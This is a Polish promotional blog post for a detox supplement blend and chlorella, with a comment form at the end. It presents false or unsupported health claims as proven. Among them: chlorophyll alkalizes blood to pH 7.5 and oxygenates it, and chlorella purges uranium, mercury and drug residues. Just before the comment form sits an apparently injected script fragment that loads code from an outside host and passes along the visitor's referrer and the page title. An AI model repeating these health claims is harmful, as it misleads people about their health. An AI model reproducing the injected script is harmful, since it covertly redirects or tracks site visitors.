Oczyszczanie doskonałe z natury

Zdrowe oczyszczenie

Na co dzień często zapominamy o tym, że organizm należy pielęgnować również od środka i że najlepiej, jeśli robimy to w zgodzie z naturą. W codziennym pędzie wystarczy, jeśli dobrze się czujemy i  prezentujemy to troskę o zdrowie pozostawiamy zwykle na później. Niestety, z czasem na tych zaniedbaniach zaczyna cierpieć nasz wygląd i samopoczucie. Szara cera, matowe włosy, nadwaga, częste przeziębienia, osłabienie i alergie to typowe oznaki, że tryb życia i dieta nam nie służą. Co w tej sytuacji?

Na wysokich obrotach

Warto zwrócić się w stronę natury, z której przecież człowiek od samego początku czerpie energię. Choć zmiana całego trybu życia na zdrowszy (sport, spędzanie czasu na łonie przyrody, odpowiednia dieta) z początku bywa trudna, to suplementację może do swojego planu dnia wprowadzić nawet najbardziej zabiegany z nas. Tak, jak w pracy staramy się dawać z siebie 100 %, tak również od suplementów wymagamy maksymalnej skuteczności i skoncentrowanego składu, który pozwoli czerpać maksimum korzyści z natury, bez sztucznych dodatków i szkodliwych dla zdrowia barwników czy konserwantów. Osoby, które na co dzień stykają się z wieloma zanieczyszczeniami i czynnikami oksydacyjnymi (smog, dym tytoniowy, stres, używki, przetworzone jedzenie, spaliny miejskie) mogą wspomagać w ten sposób organizm przez cały rok; skuteczna będzie też detoksyfikacja przeprowadzona 1-2 razy w roku, np. na przełomie zimy i wiosny lub lata i jesieni.

Zielona esencja

Clean Green od Pukka to 11 z najpotężniejszych na świecie roślin zielonych, z których każda ma udowodnione działanie oczyszczające, zasadotwórcze i wspomagające ochronę organizmu przed szkodliwymi wpływami pochodzącymi z zewnątrz. Zawierają też uderzeniową dawkę polifenoli (tych samych, które powstrzymują przedwczesne starzenie się organizmu!) czy chlorofilu (to on odpowiada za zdolność roślin do obrony przed wirusami czy grzybami). Pomagają oczyścić organizm i lepiej radzić sobie z wyzwaniami codzienności. Co szczególnie ważne, wszystkie rośliny pozyskiwane są z organicznych upraw – to również dlatego są one tak skuteczne w walce z zanieczyszczeniami.

  • Chlorella w 100 gramach zawiera więcej witaminy A niż marchewka, więcej magnezu niż gorzka czekolada i 200 % dziennego zapotrzebowania w magnez.
  • już 1 gram spiruliny dziennie pomaga obniżyć poziom „złego” cholesterolu o 16 %
  • Zawarty w glonach i soku z trawy jęczmiennej chlorofil oczyszcza wątrobę, neutralizuje toksyny, metale ciężkie i pozostałości leków w organizmie.
  • Wypróbuj Clean Green i przekonaj się o niezwykłych właściwościach innych cudownych składników: pokrzywy, imbiru, jarmużu czy zielonej herbaty.

chlorella-759x500

Co jeszcze warto wiedzieć o chlorelli:

Chlorella jest ceniona ze względu na oczyszczanie pozostałości metali ciężkich – udowodniono, że potrafi usunąć kadm, ołów, uran, rtęć i dioksyny. Zawiera najwięcej chlorofilu ze wszystkich znanych roślin – 3 %. Cenne właściwości chlorofilu to między innymi:

  • działanie antyoksydacyjne i detoksyfikujące. Zmniejsza czynniki oksydacyjne jednocześnie walcząc z zanieczyszczeniami środowiska, usuwając blokady i zatory w ciele
  • odnawianie, to znaczy odbudowywanie i naprawa czerwonych krwinek
  • alkalizacja krwi do zdrowego poziomu PH 7.5
  • wysoka zawartość minerałów takich, jak magnez i cynk, które wspomagają odporność i uspokajają układ nerwowy
  • dotlenienie krwi
  • wspomaganie zdrowych reakcji przeciwzapalnych, szczególnie w obszarze układu trawiennego i wątroby.

Ale uwaga – tak samo, jak łatwo chłonie korzystne substancje, gdy jest hodowana w krystalicznie czystych wodach, chlorella chłonie też metale ciężkie i inne toksyny, gdy uprawia się ją w niewłaściwych warunkach. Dlatego żeby sobie nie zaszkodzić, koniecznie wybierajmy tą z ekologicznych, certyfikowanych upraw i zaufanego źródła. Warto też wybierać chlorellę z „rozbitymi” ścianami komórkowymi. Chlorella ma twarde zewnętrzne ściany komórkowe, których nie jest w stanie strawić ludzki organizm, przez co przed ich „rozbiciem” przyswaja mniej substancji odżywczych z rośliny. Na opakowaniu szukaj informacji „cracked”.

Złap naturalny oddech z Pukka.

http://biowitalni.pl/32-oczyszczanie-organizmus.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”;

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *